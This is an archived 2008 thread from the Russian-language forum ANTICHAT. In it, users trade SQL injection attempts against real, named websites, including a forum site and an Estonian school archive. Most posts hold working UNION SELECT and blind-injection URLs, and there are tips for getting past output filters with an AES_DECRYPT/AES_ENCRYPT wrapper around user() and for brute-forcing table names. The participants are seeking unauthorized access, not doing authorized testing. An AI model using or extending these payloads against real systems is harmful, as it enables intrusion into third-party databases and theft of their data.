ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
15.04.2008, 22:10
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
Код:
http://hosted-forum.com/active_members.php?cat=-1+UNION+SELECT+1,version(),3/*
помогите дальше двинуться) |
|
|
16.04.2008, 00:38
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
http://hosted-forum.com/active_members.php?cat=-1+UNION+SELECT+1,version(),3/*
где ты тут нашел sql ?  )
ща проверил,скуля есть, вчера не было )))))
видать сервак глючил или админ....
Последний раз редактировалось bag; 16.04.2008 в 12:27..
|
|
|
|
16.04.2008, 17:05
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 11
Провел на форуме:
142777
Репутация:
4
|
|
Вчера смотрел, они с базой какие-то работы проводили.
|
|
|
|
17.04.2008, 17:55
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.tammiku.edu.ee/arhiv/06-07.php?month=1&year='
Ншёл сканер скулю. Сколько ни мудилсо, ниче вывести не смог ))).При запросе из баз выводит форбидден:Р. Зато запросы вида 1'+and+'2'='1&year=2008 пашут.Почему именно столько кавычек я хз.Есть подозрения, что для двойки две кавычки потому, что ид соответствует строковая переменная. Запоролся в общем йа : )(Это уже Blind sql inj).
|
|
|
|
17.04.2008, 21:43
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http:/www.tammiku.edu.ee/arhiv/06-07.php?month=4'+and+'1'='0&year=2008
Шо тут гадать то:Р
|
|
|
|
18.04.2008, 11:14
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,5,6,7/*
работает,
то на странице отображается 3 и 5
но когда хочу поставить version() то не работает ..
http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,ve rsion(),4,5,6,7/*
выдаёт ошибку
как надо сделать ?
|
|
|
|
18.04.2008, 11:24
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
короче нашёл
http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),6,7/*
работает, что я могу дальше ? |
|
|
|
18.04.2008, 12:12
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
nicusor version() ?
|
|
|
|
18.04.2008, 12:20
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
Сообщение от Piflit
nicusor version() ?
mysql : 4.1.14
|
|
|
|
18.04.2008, 12:27
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
Сообщение от nicusor
mysql : 4.1.14
можно таблицы подобрать. руками или моим скриптом/прогой от SQL
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
